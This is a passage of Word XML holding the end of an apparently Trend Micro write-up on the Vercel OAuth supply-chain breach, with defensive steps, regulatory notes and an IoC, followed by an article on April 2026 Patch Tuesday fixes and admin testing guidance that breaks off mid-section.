scanning, including but not limited to GitHub (secret scanning partner program), AWS (compromised key detection), OpenAI, Anthropic, Stripe, and Google Cloud. These notifications are now a primary early-warning channel for platform-level credential exposure. Any such notification for a key that exists only in a deployment platform should be treated as a potential indicator of platform compromise, not routine key hygiene noise.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Threat hunting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Google Workspace Admin Console - manual search steps: Admin Console -&gt; Reports -&gt; Audit and Investigation -&gt; OAuth Log Events Filter: Application Name = "Context.ai" OR Client ID = 110671459871- 30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com Date range: January 2024 - present Export all results. Any hits = immediate revocation and incident investigation.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Google Workspace - all third-party OAuth apps with broad scopes: Admin Console -&gt; Security -&gt; API Controls -&gt; Third-party app access -&gt; Manage Google Services Sort by: "App access" -&gt; "Unrestricted" For each app: verify (a) active vendor relationship exists, (b) scopes are justified by business use, (c) last-used date is recent. Any app not used in 90+ days: revoke.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Defensive recommendations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section outlines defensive recommendations based on the confirmed attack tactics from this incident.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Immediate actions (0-48 hours) Rotate all Vercel environment variables that were not marked as sensitive, regardless of whether you believe they were accessed. The cost of unnecessary rotation is trivial compared to the cost of a compromised credential.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Redeploy every environment after rotation - rotation alone does not invalidate old deployments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable the sensitive flag on all environment variables containing any form of credential, token, key, or secret. Audit every project.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit OAuth application authorizations in your Google Workspace (or Microsoft Entra) admin console. Revoke access for any application that is no longer actively used.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Review access logs for all services whose credentials were stored as Vercel environment variables, covering the period June 2024 through present.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Short-term hardening (1-4 weeks) Migrate secrets to a dedicated secrets manager (HashiCorp Vault, AWS Secrets Manager, Doppler, Infisical). Inject secrets at runtime rather than storing them as platform environment variables.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement OIDC-based authentication for CI/CD and deployment pipelines where supported, eliminating long-lived credentials entirely.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy OAuth application monitoring - commercial solutions (Nudge Security, Grip Security, Valence Security) or Google Workspace's built-in OAuth app management.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish credential rotation automation - secrets should rotate on a defined schedule (30-90 days) regardless of incident status.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Treat OAuth grants as vendor relationships - add them to your third-party risk inventory alongside contracted vendors.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Architectural changes (1-6 months) Adopt a zero-trust posture for environment variables - assume that any secret stored in a deployment platform may be exposed in a platform-level breach. Design systems so that a single credential exposure does not cascade.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement least-privilege scoping for all credentials - database credentials should have minimum required permissions, API keys should be scoped to specific operations, cloud credentials should use role-based temporary credentials rather than long-lived access keys.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish third-party vendor security review for any OAuth application or integration that accesses corporate identity systems. Include periodic re- review of existing authorizations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Include PaaS platforms in your SBOM/ASPM inventory - this breach argues deployment platforms should be treated as tier-1 supply-chain dependencies, not external services.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Recommended monitoring Audit Google Workspace Admin Console for the above OAuth Client ID. Monitor Vercel audit logs for unexpected env.read or env.list API calls. Review CloudTrail, GCP Audit Logs, and Azure Activity Logs for usage of credentials stored as Vercel env vars from unexpected IPs or user agents during June 2024 - April 2026.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for any of the LiteLLM or Axios-related IOCs published by their respective advisories if those packages are in your dependency tree. Watch for unsolicited leaked-credential notifications from major API providers during the exposure window.</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Regulatory and compliance implications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Organizations affected by credential exposure through the Vercel breach should evaluate notification obligations under: GDPR (EU): If exposed credentials provided access to systems containing EU personal data, the 72-hour breach notification clock may have started upon confirmation of exposure. The April 10 OpenAI notification raises the question of whether some organizations' awareness predates Vercel's April 19 disclosure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CCPA/CPRA (California): Exposure of credentials providing access to consumer data may trigger notification requirements.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PCI DSS: If payment processor credentials (Stripe, Braintree, Adyen) were exposed, PCI incident response procedures and forensic investigation requirements may apply.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SOC 2: Organizations with SOC 2 obligations should document the incident, credential rotation actions taken, and updated controls in their continuous monitoring evidence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SEC Cybersecurity Rules (8-K): Public companies determining the breach is material have a 4-business-day disclosure obligation.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challenge is that many organizations may not yet know whether the exposed credentials were actually used for unauthorized access - but regulatory frameworks often trigger on exposure, not confirmed exploitation.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Conclusion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Vercel breach is not an isolated incident - it is the latest manifestation of a structural vulnerability in how the software industry manages secrets and trust relationships. In the span of three weeks, we have seen: LiteLLM: CI/CD credentials stolen -&gt; malicious packages harvesting developer secrets at scale.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Axios: Maintainer account hijacked -&gt; RAT deployed to millions of developer environments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Vercel: OAuth application compromised -&gt; platform-level access to customer deployment secrets, with at least one public report suggesting downstream credential abuse detected in the wild prior to disclosure.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Each attack targets a different link in the software supply chain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Together, they paint a picture of an ecosystem where credentials are the universal target and trust relationships are the universal attack surface. The cascade the industry has warned about is no longer purely theoretical.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defensive path forward is clear, if not easy: Stop storing long-lived credentials in platform environment variables. Use dedicated secret managers with runtime injection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Stop trusting OAuth applications implicitly. Audit, monitor, and periodically re-authorize.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Stop assuming your platform provider's internal security posture. Design for the scenario where they are breached.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Start rotating credentials proactively - and remember to redeploy afterward. Treat leaked-credential notifications from third-party providers as high- priority early-warning signals, not routine noise.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organizations that will weather the next platform breach are those that assumed it would happen and built their credential architecture accordingly.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Indicators of Compromise (IoCs)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Confirmed IoC Type Value Context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OAuth Client ID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110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com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Compromised Context.ai OAuth application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2026.04.20 14:55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/26/d/vercel-breach-oauth-supply-chain.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Microsoft's Patch Tuesday release for April is a whopper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Apr 17, 2026</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Nearly every major product family needs immediate patching, from Windows to Office to Microsoft Edge, SQL Server, and even Microsoft Developer Tools.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Windows admins are going to be busy this month, dealing with the largest Patch Tuesday cycle we can recall. The April release involves 165 updates and roughly 340 unique CVEs from Microsoft - including two zero-days, one of which is already being actively exploited in the wild.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Readiness team is recommending "Patch Now" schedules for nearly every major product family this month: Windows, Office (with a zero-day), Microsoft Edge (Chromium), SQL Server, and Microsoft Developer Tools (.NET). April also brings Phase 2 of Microsoft's Kerberos RC4 hardening with full enforcement set for July. There is a lot to cover, so the Readiness team built an infographic mapping the deployment risk for each platform.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information about recent Patch Tuesday releases is available here.)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Known issues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Microsoft reports a single Windows 11 25H2 issue. It affects a narrow enterprise deployment group, but matters to anyone affected.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KB5083769 - BitLocker recovery prompt on first restart (Windows 11 25H2/24H2). Devices with BitLocker enabled on the OS drive and the Group Policy "Configure TPM platform validation profile for native UEFI firmware configurations" set with PCR7 in the validation profile may be prompted for the BitLocker recovery key on the first restart after installing this update. Recommendation: Remove the PCR7 Group Policy configuration and run gpupdate /force before installing. Issues resolved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April's KB5083769 closes four issues, three quality-of-life and one multi- cycle reset failure: KB5083769 - Reset this PC (Windows 11 25H2/24H2). Resolves a defect that broke device reset on certain hardware and configuration combinations, taking the last-resort recovery path with it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>KB5083769 - Secure Boot certificate rollout. The ongoing Secure Boot CA refresh picks up two improvements: the Windows Security app now displays certificate update status directly (Settings → Privacy &amp; Security → Windows Security), and the quality update widens the device- targeting data for the staged rollout.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>KB5083769 - SMB compression over QUIC. SMB compression requests over QUIC now complete more consistently; the update addresses prior timeouts. KB5083769 - Remote Desktop anti-phishing. Opening a .RDP file now triggers a confirmation dialog listing every requested connection setting, each disabled by default. Users must explicitly opt in to local resource sharing before the connection is made; a one-time security warning appears the first time a .RDP file is opened after installing the update. Major revisions and mitigations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Microsoft released no major revisions to Windows or Office. But Azure and Chromium/Edge have picked up several updates since the last month:</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Microsoft documented four critical Azure CVEs; no user action required. Microsoft re-published 141 Chrome/V8/WebGL/WebML/WebRTC fixes from the weekly upstream cadence; Edge picks them up through its own auto-update channel.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 Microsoft published 145 CVEs that affected Edge over the past 30 days. That averages out to around five reported security vulnerabilities per (working) day. Does anybody remember the good old days when we just had 10 critical-rated memory-related issues with IE - each month? Windows lifecycle and enforcement updates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saying that "April is the cruelest month" seems apropos, as we have three rather strict enforcements from Microsoft: Kernel driver cross-signed trust - evaluation mode begins April. Microsoft is dropping trust for legacy kernel drivers signed under the deprecated cross-signed root program, audit-only on Windows 11 24H2/25H2/26H1 and Server 2025.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Kerberos RC4 hardening Phase 2 - April. Following November 2025's Phase 1, domain controllers now default to AES-SHA1 encrypted tickets for accounts without an explicit Kerberos encryption type configured (CVE-2026-20833). The enforcement phase begins in July.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Windows Deployment Services hands-free deployment - disabled by default from April. Hardening for CVE-2026-0386 (Unattend.xml over unauthenticated RPC) disables hands-free WDS deployment by default, beginning with the April update. Admins can override, but Microsoft does not recommend doing so. Testing guidance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Each month, the Readiness team analyzes the latest Patch Tuesday updates and provides detailed, actionable testing guidance. April's release covers 56 component updates across Windows. Microsoft flagged two as High Risk - Kerberos authentication and the Remote Desktop client - and delivered five patches to the Projected File System driver affecting cloud sync scenarios. Secure Boot and BitLocker validation expands to seven scenarios this cycle, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>including a new Windows Hello PIN persistence check. Prioritize Kerberos infrastructure, Remote Desktop stability, and cloud sync before broad deployment.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Kerberos and KDC</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Kerberos Key Distribution Center (kdcsvc.dll) and client library (kerb3961.dll) carry a High Risk flag this month. Microsoft's guidance targets environments using keytab-based authentication with RC4 encryption - a legacy configuration common in mixed Windows and non-Windows service environments. The client-side update affects only Windows 10 1607, but server-side changes apply to all editions from Windows Server 2022 through 2025. After installing the update on domain controllers, open Event Viewer and review the System and Security logs for events with IDs 201-209.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Capture full event details for any new events in that range: text, timestamp, and affected account or service.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Focus testing on long-running services authenticating via RC4 keytabs, as these are most likely to surface failures after the update. Remote Desktop client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Microsoft also flags the Remote Desktop ActiveX control (mstscax.dll) as High Risk. The update affects clipboard redirection, printer redirection, and session reconnection stability across all supported Windows versions. A separate update to mstsc.exe covers SmartScreen behavior for .RDP file handling, RemoteApp, and Hyper-V Enhanced Session mode.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Connect to a remote device using mstsc.exe and check that the session establishes and remains stable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Copy and paste between local and remote sessions, both text and files, and expect correct transfer in both directions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Redirect a local printer into the remote session, print a test page, and confirm the job completes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disconnect, reconnect, and verify clipboard and printer redirection survive the reconnection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Expect RemoteApp resources to launch normally and Hyper-V Enhanced Session mode to connect without error. Secure Boot and BitLocker (continuing)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Secure Boot and BitLocker testing now expands to seven scenarios, including a new Windows Hello PIN persistence test. These validate Secure Boot state, BitLocker encryption, and key rolling related to the ongoing CVE-2023-24932 mitigation. Perform only on dedicated test devices with recovery keys backed up.</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Enable BitLocker on the OS drive, verify TPM protectors are present using manage-bde -protectors -get c:, then disable and verify the drive is fully decrypted.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable BitLocker on a data drive, verify protectors, then disable and verify decryption completes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>With Secure Boot enabled, enable BitLocker, trigger the recovery screen using reagentc /boottore, and verify the recovery key unlocks the drive. With Secure Boot disabled, enable BitLocker, force recovery via BCD test signing changes, unlock with recovery key, suspend BitLocker, and verify normal boot resumes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>With both enabled, apply the Secure Boot key update (CVE-2023-24932) and verify the system boots without triggering recovery.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test hibernation with Secure Boot and BitLocker both enabled and verify clean resume without recovery prompts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>On a device running March 2026, enable Windows Hello PIN and BitLocker, install the April update, and confirm the PIN still works. Networking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April patches the Ancillary Function Driver for WinSock (afd.sys) twice - once paired with the TDX transport driver, once standalone - making it the most-patched network component this month. A separate patch to HTTP.sys affects HTTP/3 on Windows 11 23H2 and 22H2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Browse websites, download and upload files (including large files), and test VPN and Remote Desktop connections over both IPv4 and IPv6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Check that Teams, Outlook, and other messaging applications sign in, send messages, and reconnect after network blips.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test sandboxed and low-privilege processes - Edge, Store apps, and Electron apps - to confirm their network requests succeed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Generate sustained network load and confirm no BSODs, no new errors in Event Viewer, and no throughput degradation. VPN and IPsec</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April patches two VPN components: the Windows Filtering Platform driver (wfplwfs.sys) and the IKE Extensions service (ikeext.dll). The WFP update targets UWP VPN plug-in stability, sleep/wake recovery, and Always On VPN. The IKE update covers IKEv2 tunnels, IPsec security associations, and Connection Security Rules.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Connect and disconnect your UWP VPN plug-in client repeatedly (10+ cycles) and confirm the client remains usable and the system stays stable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Keep the VPN connected for 30+ minutes during active use; verify it survives network changes (Wi-Fi to Ethernet) and sleep/wake cycles. If using Always On VPN, confirm it connects at sign-in and reconnects after network loss.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish IKEv2 VPN connections and verify the tunnel is stable and internal resources are reachable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Validate that Connection Security Rules negotiate IPsec correctly and that protected traffic remains protected. Authentication and security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Patches to the SSPI kernel drivers (ksecdd.sys, ksecpkg.sys) span NTLM, Kerberos, CredSSP, and TLS/SSL. The Windows Hello for Business stack also picks up updates for Enhanced Sign-in Security.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Exercise end-to-end sign-in and resource-access flows for applications that use NTLM, Kerberos, CredSSP, or TLS/SSL authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Test both success and failure cases: correct versus incorrect credentials, allowed versus denied accounts, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>expired certificates.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Verify Windows Hello for Business authentication with Enhanced Sign-in Security across sign-in, lock, unlock, and reboot cycles. Graphics, Shell and desktop</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April updates span Direct3D, the Desktop Window Manager, and the graphics kernel (win32kbase.sys, win32kfull.sys). The Windows Shell (shell32.dll) picks up a patch affecting Mark-of-the-Web preservation for downloaded shortcuts, and COM Automation (oleaut32.dll) gets an update.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Run stress tests with sustained UI activity: rapid open/close of windows, snap layouts, virtual desktop switching, and multi-monitor connect/disconnect.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test GPU-accelerated workloads - video playback, 3D applications, browser hardware acceleration - and check for visual artifacts or flickering. Download a .lnk shortcut file from the internet and confirm SmartScreen displays a warning when the shortcut is opened - verifying Mark-of-the-Web is preserved.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
